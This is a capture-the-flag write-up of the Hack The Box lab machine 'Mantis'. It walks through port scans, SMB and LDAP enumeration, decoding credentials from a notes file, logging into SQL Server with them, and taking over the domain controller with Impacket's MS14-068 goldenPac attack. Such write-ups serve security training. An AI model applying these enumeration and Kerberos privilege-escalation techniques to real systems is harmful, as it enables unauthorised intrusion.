If it were me I would have named this box, Rabbit hole. It’s already given as a hard box and it indeed was. There were a lot of services open, and checking each of them to find a vulnerability was nothing less than tedious. At the same time the challenge taught me a ton of new things. There was a time when I had to re-run the port enumeration to find something that I missed out on. While running the exploit I faced difficulties due to a skew time, which was due to my machine not having the same time as the host. There are a lot of things to discuss!!
Initial Analysis
Mantis is a windows box with IP 10.10.10.52. Running port scan.
# Nmap 7.91 scan initiated Sun Mar 28 02:57:16 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,636,1433,3268,3269,8080,49153,49154,49155,49157,49158 -oN nmap/Basic_10.10.10.52.nmap 10.10.10.52 Nmap scan report for mantis.htb (10.10.10.52) Host is up (0.19s latency).
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-28 07:04:14Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 636/tcp open tcpwrapped 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2021-03-28T06:59:45 |_Not valid after: 2051-03-28T06:59:45 |_ssl-date: 2021-03-28T07:05:25+00:00; +6m51s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Microsoft-IIS/7.5 |_http-title: Tossed Salad - Blog 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 54m51s, deviation: 1h47m22s, median: 6m50s | ms-sql-info: | 10.10.10.52:1433: | Version: | name: Microsoft SQL Server 2014 RTM | number: 12.00.2000.00 | Product: Microsoft SQL Server 2014 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: mantis | NetBIOS computer name: MANTIS\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: mantis.htb.local |_ System time: 2021-03-28T03:05:16-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-03-28T07:05:12 |_ start_date: 2021-03-28T06:59:22
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Mar 28 02:58:40 2021 -- 1 IP address (1 host up) scanned in 83.60 seconds
This is one of the first thing that I got wrong, and only found it out later. I will come to this down the line.
There are a lot of services open, as always adding this to the hosts. The OS discovery was able to find the domain names so I will be adding the same.
There is nothing good here. I also did a fuzz for directoires and files, nothing came up.
No good. It’s kind of clear that presuing this anymore is a waste of time. Moving on.
LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a “lightweight” (smaller amount of code) version of Directory Access Protocol (DAP).
I was able to find a pentesting guide on ldap. Trying it out.
└─$ ipython3 Python 3.9.1+ (default, Feb 52021, 13:46:56) Type 'copyright', 'credits'or'license'for more information IPython 7.19.0 -- An enhanced Interactive Python. Type '?'for help.
In [1]: import ldap3
In [2]: server = ldap3.Server('10.10.10.52', get_info = ldap3.ALL, port =636, use_ssl = Tru ...: e)
In [3]: connection = ldap3.Connection(server)
In [4]: connection.bind() --------------------------------------------------------------------------- LDAPSocketOpenError Traceback (most recent call last)
if self.closed: # try to open connection if closed --> 561 self.open(read_server_info=False) 562if self.authentication == ANONYMOUS: 563if log_enabled(PROTOCOL):
I tried out all the other ldap-ports 389, 3268, 3269. No luck. Unable to get a True response.
Microsoft Remote Procedure Call, also known as a function call or a subroutine call, is a protocol that uses the client-server model in order to allow one program to request service from a program on another computer without having to understand the details of that computer’s network.
┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap] └─$ smbmap -H 10.10.10.52 1 ⨯ /usr/lib/python3/dist-packages/impacket/smbserver.py:2464: SyntaxWarning: "is not" with a literal. Did you mean "!="? if jtr_dump_path is not '': /usr/lib/python3/dist-packages/impacket/smbserver.py:2500: SyntaxWarning: "is not" with a literal. Did you mean "!="? if jtr_dump_path is not '': /usr/lib/python3/dist-packages/impacket/smbserver.py:2842: SyntaxWarning: "is not" with a literal. Did you mean "!="? if jtr_dump_path is not '': /usr/lib/python3/dist-packages/impacket/smbserver.py:4416: SyntaxWarning: "is not" with a literal. Did you mean "!="? if credentials_fname is not "": [+] IP: 10.10.10.52:445 Name: mantis.htb.local ┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap] └─$ sudo nbtscan -r 10.10.10.52/24 [sudo] password for kali: Doing NBT name scan for addresses from 10.10.10.52/24
IP address NetBIOS Name Server User MAC address ------------------------------------------------------------------------------ ┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap] └─$ smbclient -no-pass -L //10.10.10.52 Enter WORKGROUP\kali's password: Anonymous login successful Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available ┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap] └─$ smbclient -U '%' -N \\\\10.10.10.52\\NETLOGON tree connect failed: NT_STATUS_ACCESS_DENIED
Running out of stuff to check. MySQL? That was a funny story, I tried brute forcing into the msql server using medusa.
That didn’t work.
Kerberos, this is my first time pentesting kerberos. Found this article, no use since I don’t have the username and password. -_-
At this point it’s pretty clear that I missed something. The best way forward is to do another enumeration.
┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap/nmap] └─$ cat Full_10.10.10.52.nmap # Nmap 7.91 scan initiated Mon Mar 29 01:26:29 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,47001,49152,49153,49154,49155,49157,49158,49164,49166,49168,50255 -oN nmap/Full_10.10.10.52.nmap 10.10.10.52 Nmap scan report for mantis.htb (10.10.10.52) Host is up (0.19s latency).
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-29 05:33:29Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1337/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2021-03-28T06:59:45 |_Not valid after: 2051-03-28T06:59:45 |_ssl-date: 2021-03-29T05:34:40+00:00; +6m52s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 8080/tcp open http Microsoft IIS httpd 7.5 |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Microsoft-IIS/7.5 |_http-title: Tossed Salad - Blog 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49164/tcp open msrpc Microsoft Windows RPC 49166/tcp open msrpc Microsoft Windows RPC 49168/tcp open msrpc Microsoft Windows RPC 50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000 | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2021-03-28T06:59:45 |_Not valid after: 2051-03-28T06:59:45 |_ssl-date: 2021-03-29T05:34:40+00:00; +6m52s from scanner time. Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 41m09s, deviation: 1h30m44s, median: 6m51s | ms-sql-info: | 10.10.10.52:1433: | Version: | name: Microsoft SQL Server 2014 RTM | number: 12.00.2000.00 | Product: Microsoft SQL Server 2014 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: mantis | NetBIOS computer name: MANTIS\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: mantis.htb.local |_ System time: 2021-03-29T01:34:31-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-03-29T05:34:28 |_ start_date: 2021-03-28T06:59:22
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Mar 29 01:27:54 2021 -- 1 IP address (1 host up) scanned in 84.96 seconds
Something new just turned up port 1337 is running another http service, and for the first time I understand the meaning of enumerate harder!!
The secure notes page contained 2 files, the contents of the dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt file was.
1 2 3 4 5 6 7 8 9 10 11 12 13
1. Download OrchardCMS 2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database 3. Launch IIS and add new website and point to Orchard CMS folder location. 4. Launch browser and navigate to http://localhost:8080 5. Set admin password and configure sQL server connection string. 6. Add blog pages with admin user.
Credentials stored in secure format OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001 SQL Server sa credentials file namez
Finally something useful. Seems like I can get the creds for the CMS from here.
1 2 3 4 5 6 7
In [11]: import binascii
In [12]: x = int('0b010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001',2)
In [13]: binascii.unhexlify('%x' % x) Out[13]: b'@dm!n_P@ssW0rd!'
I poked around the admin dashboard and searched for any RCE. Couldn’t find anything. Another Rabbit hole, most probably!
It was given the SQL server password is also there in the file, tried loging into the SQL server using the above password. It didn’t work.
Checking the secure notes file again gave me the clue. The file name has some encoded stuff present.
The decoded value is in hex, converting it to ASCII.
┌──(kali㉿kali)-[~/HackTheBox/mantis] └─$ mssqlclient.py 'sa:m$$ql_S@_P@ssW0rd!@10.10.10.52' 2 ⨯ /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed for user 'sa'. ┌──(kali㉿kali)-[~/HackTheBox/mantis] └─$ mssqlclient.py 'root:m$$ql_S@_P@ssW0rd!@10.10.10.52' /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed for user 'root'. ┌──(kali㉿kali)-[~/HackTheBox/mantis] └─$ mssqlclient.py 'admin:m$$ql_S@_P@ssW0rd!@10.10.10.52' 1 ⨯ /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (120 7208) [!] Press helpfor extra shell commands SQL> EXEC xp_cmdshell 'whoami.exe'; [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. SQL> EXEC xp_cmdshell 'whoami'; [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. SQL>
Guess I won’t be able to execute any commands here. Maybe I will get info from the Db.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
SQL> SELECT name FROM master.dbo.sysdatabases name
MySQL skills are pretty bad. I will try out some GUI tool to check out the DB. Found a tool called DBeaver.
Found something useful in the orcharddb, Table blog_Orchard_Users_UserPartRecord
Now that I have a username and password kerberos might work.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(kali㉿kali)-[~/HackTheBox/mantis] └─$ crackmapexec smb 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' 1 ⨯ /usr/lib/python3/dist-packages/impacket/smbserver.py:2464: SyntaxWarning: "is not" with a literal. Did you mean "!="? if jtr_dump_path is not '': /usr/lib/python3/dist-packages/impacket/smbserver.py:2500: SyntaxWarning: "is not" with a literal. Did you mean "!="? if jtr_dump_path is not '': /usr/lib/python3/dist-packages/impacket/smbserver.py:2842: SyntaxWarning: "is not" with a literal. Did you mean "!="? if jtr_dump_path is not '': /usr/lib/python3/dist-packages/impacket/smbserver.py:4416: SyntaxWarning: "is not" with a literal. Did you mean "!="? if credentials_fname is not "": SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) SMB 10.10.10.52 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd! ┌──(kali㉿kali)-[~/HackTheBox/mantis]
Okay that didn’t work. It’s pretty sure that we can use the james login to get the shell. The only question is how.
Exploit
Kerberos , from this article I got to know that the authentication in kerberos relies on tickets and there are cases where the system doesn’t verify these tickets which can lead to all sorts of bad things. One issue that we might face here is that the system checks for the timestamp.
There is a myth in the Windows Kerberos world that if a workstation’s clock is skewed more than 5 minutes from that of the Domain Controller, Kerberos authentication wouldn’t work.
Is this possible?
F-secure labs blog on MS14-068 suggested that using the Impacket goldenPac module the system can be exploited. The walkthrough of this exploit in other forms require a lot more effort, which includes fetching the SID, then moving on to the creation of the ticket.
One thing to make sure is the time. Using rdate to set the system’s date from the host. The args -4ns means using IPv4 addresses, using SNTP and s to set the time.
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103 [*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657 [*] Attacking domain controller mantis.htb.local [*] mantis.htb.local found vulnerable! [*] Requesting shares on mantis.htb.local..... [*] Found writable share ADMIN$ [*] Uploading file FLOoVAWU.exe [*] Opening SVCManager on mantis.htb.local..... [*] Creating service ckTW on mantis.htb.local..... [*] Starting service ckTW..... [!] Press helpfor extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami nt authority\system
Logged in as root, and that is how I owned mantis.